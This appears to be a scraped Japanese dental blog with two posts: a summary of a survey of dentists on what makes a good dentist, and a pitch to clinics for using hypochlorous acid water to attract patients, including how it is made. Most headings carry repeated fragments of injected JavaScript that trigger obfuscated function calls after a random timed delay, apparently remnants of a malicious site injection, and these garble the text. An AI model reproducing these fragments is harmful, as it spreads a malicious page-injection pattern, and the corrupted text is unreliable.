投稿日:

歯科医師が考える「良い歯医者とは」

本当に「いい歯医者」を見分ける5つの条件andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}

先日、東洋経済でこんな記事をみつけました。

本当に「いい歯医者」を見つける5つの条件。174人の現役の歯科医の先生に聞いたアンケートです。

第1位 初回の診察時間が長い                     96/174人が回答

第2位 自分が不得意な治療は断る                   81/174人が回答

第3位 治療の度に歯の写真を撮る                   66/174人が回答

第4位 治療の前に歯科衛生士が口中を清掃する             52/174人が回答

第5位 すぐに虫歯をげ削ろうとしない                 38/174人が回答

 

第1位、最も多くの先生が挙げたのが、「初回診察時間の長さ」これは、正しい診察をするために、患者の話をよく聞きよく会話をする必要性を言っているようです。別のアンケートでも、患者が歯科医師に期待するなかで、「患者の症状の理解度」を2番目に挙げてます。

 

第2位、以外にも、本当に良い歯医者は自分の不得意な治療はせず、希望があれば別の医院を紹介すると言ってます。「いまどきのクリニックは、ホームページに医師の経歴、どのジャンルの治療をより得意としているかが分かります。」 別のアンケートでは、医師の適切な指導力、アドバイス力に期待するのがトップになってます。それが、このへんと被るのですね。自分の得意分野をPRする必要があるんですね。

 

第3位、歯の写真を撮影することで、患者自身の口の中をしっかりと確認してもらい、治療の方針説明などに使う。中には、写真を見ながらスタッフ一同で検討会をすることも。

 

第4位、口の中は細菌だらけ、十分なクリーニングをしないで治療をした場合、汚れごと歯の型をとったり、汚れを巻き込んだ状態で詰め物をしたりして治療結果が良くない。医師による治療と同じくらい、歯科衛生士による口内クリーニングは重要。

 

第5位、虫歯がらといってすぐに削るのはあまり良くない。どうしても削る場合は、マイクロスコープなど拡大鏡を使って、削る場所を最少にする努力をするのが、良い歯医者。さらに、従来なら削る虫歯でも、削らなくても大丈夫なケースも出てきてます。十分に説明する必要があります。

 

別のアンケートでは、信頼してもらえる歯科医師の条件では、

1位、医師の人間性、

2位、適切な指導力、アドバイス力、

3位、話しやすい雰囲気             がベスト3です。

 

患者立場からではありませんが、私が読んでも「なるほど!」と納得するところがあります。歯科の先生の参考になればと思います

 

 

 

投稿日:

歯科医院向け「次亜塩素酸水を使った集患の方法」

歯科医院様向け 「次亜塩素酸水の歯科利用」についてandom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}

❒歯科業界の現状andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}

よく言われていることですが、歯科医院の数はコンビニの件数より多い。実際に、コンビニ店数54、413件(平成28年度調査)歯科医院数 68、756件(厚労省、医療施設調べ)と歯科医院の数が多くなっています。しかもこの数は年々増加傾向にあり、毎年1500人のペースで歯科医師が誕生しています。特に都心部では、10万人当たりの医院数が過疎地に対して2倍近く開院しており廃院する医院も多いのが現状です。

もともと歯科医療は、地域密着型の医療サービスで、あまり遠方からの来院は期待できません。人口の減少による受診患者の減少、保険点数の引き下げ、歯科医院数の増加、当然過当競争が生まれます。いかに集患を成功させるのか、いかに既存患者を取り込むのかが生き残る「鍵」になっていますが、その答えを見出すのは容易ではありません。

そこで今回私が提案させていただくのが、次亜塩素酸水を使った集患、増患です。

❒まず最初にお伝えしなければいけないこと。

次亜塩素酸水の歯科利用については賛否両論があり、現時点で歯科治療への使用に対しては、事前に十分な情報提供を行い、患者さんの同意を得たうえで歯科医師の責任の下に行うことが必要です。

❒次亜塩素酸水の作り方と種類andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}

作り方は、主に3通り

・電気分解方式・・・溶剤が食塩水、希塩酸、食塩水+希塩酸の3種類あり、また電気分解に使う電解槽が、隔膜がある有隔膜槽と無隔膜槽があります。

・二液混合方式・・・次亜塩素酸ナトリウムと塩酸やクエン酸を混ぜ合わせる方法。

・ジククロロイソシアヌル酸ナトリウム・・・粉末のジクロロイソシアヌル酸ナトリウムを水で溶いて作る方法。プールの殺菌消毒などに使われます。

次亜塩素酸水の種類

名称 電解槽 被電解液 pH 有効塩素濃度(ppm)
強酸性次亜塩素酸水   二室型/三室型   NaCl水 2.7以下* 20~60
弱酸性次亜塩素酸水   二室型/三室型    NaCl水 2.7~5.0 10~60
微酸性次亜塩素酸水 一室型 塩酸水 5.0~6.5 10~30
塩酸/NaCl水 5.0~6.5 50~80
電解次亜水 一室型 NaCl水 7.5~10 50~200

 

*強酸性次亜塩素酸水のpHは実際的には2.2~2.7である。pH2.2以下では塩素ガスの発生が激しくなる。

参照wikipedia

❒歯科では、どんな次亜塩素酸水を使っている?andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}